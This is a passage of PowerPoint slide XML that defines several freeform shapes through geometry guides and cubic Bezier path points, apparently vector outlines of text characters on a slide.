            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 195"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 195"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 195"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 112 w 195"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 195"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 115 w 195"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 145 w 195"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 195"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 189 w 195"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 115 w 195"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 195"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 109 w 195"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 195 w 195"/>
                <a:gd name="T25"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5" h="222">
                  <a:moveTo>
                    <a:pt x="195" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="115" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="145" y="30"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="189" y="51"/>
                    <a:pt x="189" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="46" y="222"/>
                    <a:pt x="109" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="195" y="173"/>
                    <a:pt x="195"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25" name="Freeform 266">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF7D58C-4C65-439C-B10C-CCBDCB03F5CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId66"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1525589" y="3521076"/>
              <a:ext cx="98425" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 35 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 110 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 1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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="23" y="59"/>
                    <a:pt x="35" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="107"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="110"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131"/>
                    <a:pt x="77" y="112"/>
                    <a:pt x="150" y="11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26" name="Freeform 267">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F155C89-F45F-4D76-8941-0CDFC4AE9F4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId67"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1627189" y="3521076"/>
              <a:ext cx="100013" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 87 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 87 h 329"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 135 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 110 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 25 h 329"/>
                <a:gd name="T22" fmla="*/ 57 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 21 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 19 h 329"/>
                <a:gd name="T28" fmla="*/ 20 w 237"/>
                <a:gd name="T29" fmla="*/ 34 h 329"/>
                <a:gd name="T30" fmla="*/ 43 w 237"/>
                <a:gd name="T31" fmla="*/ 34 h 329"/>
                <a:gd name="T32" fmla="*/ 43 w 237"/>
                <a:gd name="T33" fmla="*/ 298 h 329"/>
                <a:gd name="T34" fmla="*/ 21 w 237"/>
                <a:gd name="T35" fmla="*/ 298 h 329"/>
                <a:gd name="T36" fmla="*/ 0 w 237"/>
                <a:gd name="T37" fmla="*/ 314 h 329"/>
                <a:gd name="T38" fmla="*/ 20 w 237"/>
                <a:gd name="T39" fmla="*/ 329 h 329"/>
                <a:gd name="T40" fmla="*/ 99 w 237"/>
                <a:gd name="T41" fmla="*/ 329 h 329"/>
                <a:gd name="T42" fmla="*/ 119 w 237"/>
                <a:gd name="T43" fmla="*/ 314 h 329"/>
                <a:gd name="T44" fmla="*/ 99 w 237"/>
                <a:gd name="T45" fmla="*/ 298 h 329"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 298 h 329"/>
                <a:gd name="T48" fmla="*/ 77 w 237"/>
                <a:gd name="T49" fmla="*/ 19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 h="329">
                  <a:moveTo>
                    <a:pt x="77" y="87"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="57"/>
                    <a:pt x="106" y="31"/>
                    <a:pt x="137" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="31"/>
                    <a:pt x="203" y="67"/>
                    <a:pt x="203" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="158"/>
                    <a:pt x="168" y="191"/>
                    <a:pt x="133" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="191"/>
                    <a:pt x="77" y="147"/>
                    <a:pt x="77" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="87"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="217"/>
                    <a:pt x="119" y="221"/>
                    <a:pt x="135" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="174"/>
                    <a:pt x="237" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="49"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="140" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="94" y="9"/>
                    <a:pt x="77" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="298"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="298"/>
                    <a:pt x="0" y="298"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="329"/>
                    <a:pt x="13" y="329"/>
                    <a:pt x="20" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="329"/>
                    <a:pt x="119" y="329"/>
                    <a:pt x="119" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="298"/>
                    <a:pt x="107" y="298"/>
                    <a:pt x="99" y="298"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="19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27" name="Freeform 268">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60962979-423F-47D5-97AF-BB36562F0763}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId68"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1746251" y="3521076"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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28" name="Freeform 269">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C9BF3A-2EC1-46C5-947F-CC752FA5FCC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId69"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1881189" y="3465513"/>
              <a:ext cx="55563" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 373 h 387"/>
                <a:gd name="T2" fmla="*/ 120 w 132"/>
                <a:gd name="T3" fmla="*/ 358 h 387"/>
                <a:gd name="T4" fmla="*/ 35 w 132"/>
                <a:gd name="T5" fmla="*/ 194 h 387"/>
                <a:gd name="T6" fmla="*/ 121 w 132"/>
                <a:gd name="T7" fmla="*/ 29 h 387"/>
                <a:gd name="T8" fmla="*/ 132 w 132"/>
                <a:gd name="T9" fmla="*/ 14 h 387"/>
                <a:gd name="T10" fmla="*/ 117 w 132"/>
                <a:gd name="T11" fmla="*/ 0 h 387"/>
                <a:gd name="T12" fmla="*/ 0 w 132"/>
                <a:gd name="T13" fmla="*/ 194 h 387"/>
                <a:gd name="T14" fmla="*/ 41 w 132"/>
                <a:gd name="T15" fmla="*/ 323 h 387"/>
                <a:gd name="T16" fmla="*/ 117 w 132"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 132 w 132"/>
                <a:gd name="T19" fmla="*/ 373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387">
                  <a:moveTo>
                    <a:pt x="132" y="373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="366"/>
                    <a:pt x="129" y="364"/>
                    <a:pt x="120" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="316"/>
                    <a:pt x="35" y="249"/>
                    <a:pt x="35" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="144"/>
                    <a:pt x="54" y="74"/>
                    <a:pt x="121" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="24"/>
                    <a:pt x="132" y="22"/>
                    <a:pt x="132" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="10"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="117" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="253"/>
                    <a:pt x="23" y="298"/>
                    <a:pt x="41" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="105" y="387"/>
                    <a:pt x="117" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="387"/>
                    <a:pt x="132" y="377"/>
                    <a:pt x="132" y="37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29" name="Freeform 270">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B5AFA5-258E-4AA5-A68D-576BF8F91E80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId70"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1963739" y="3482976"/>
              <a:ext cx="100013" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 290 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 275 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 275 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 21 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 138 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 308"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 16 h 308"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 31 h 308"/>
                <a:gd name="T22" fmla="*/ 160 w 237"/>
                <a:gd name="T23" fmla="*/ 31 h 308"/>
                <a:gd name="T24" fmla="*/ 160 w 237"/>
                <a:gd name="T25" fmla="*/ 110 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 198 h 308"/>
                <a:gd name="T30" fmla="*/ 97 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 160 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 160 w 237"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 160 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 99 w 237"/>
                <a:gd name="T39" fmla="*/ 278 h 308"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 198 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 118 h 308"/>
                <a:gd name="T44" fmla="*/ 160 w 237"/>
                <a:gd name="T45" fmla="*/ 17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7" h="308">
                  <a:moveTo>
                    <a:pt x="160" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="298"/>
                    <a:pt x="160" y="305"/>
                    <a:pt x="180" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="305"/>
                    <a:pt x="237" y="305"/>
                    <a:pt x="237" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="275"/>
                    <a:pt x="224" y="275"/>
                    <a:pt x="217" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="118" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="31"/>
                    <a:pt x="131" y="31"/>
                    <a:pt x="138" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="110"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="95"/>
                    <a:pt x="123" y="87"/>
                    <a:pt x="102" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="87"/>
                    <a:pt x="0" y="135"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="260"/>
                    <a:pt x="45" y="308"/>
                    <a:pt x="97" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="308"/>
                    <a:pt x="146" y="295"/>
                    <a:pt x="160" y="280"/>
                  </a:cubicBezTo>
                  <a:close/>
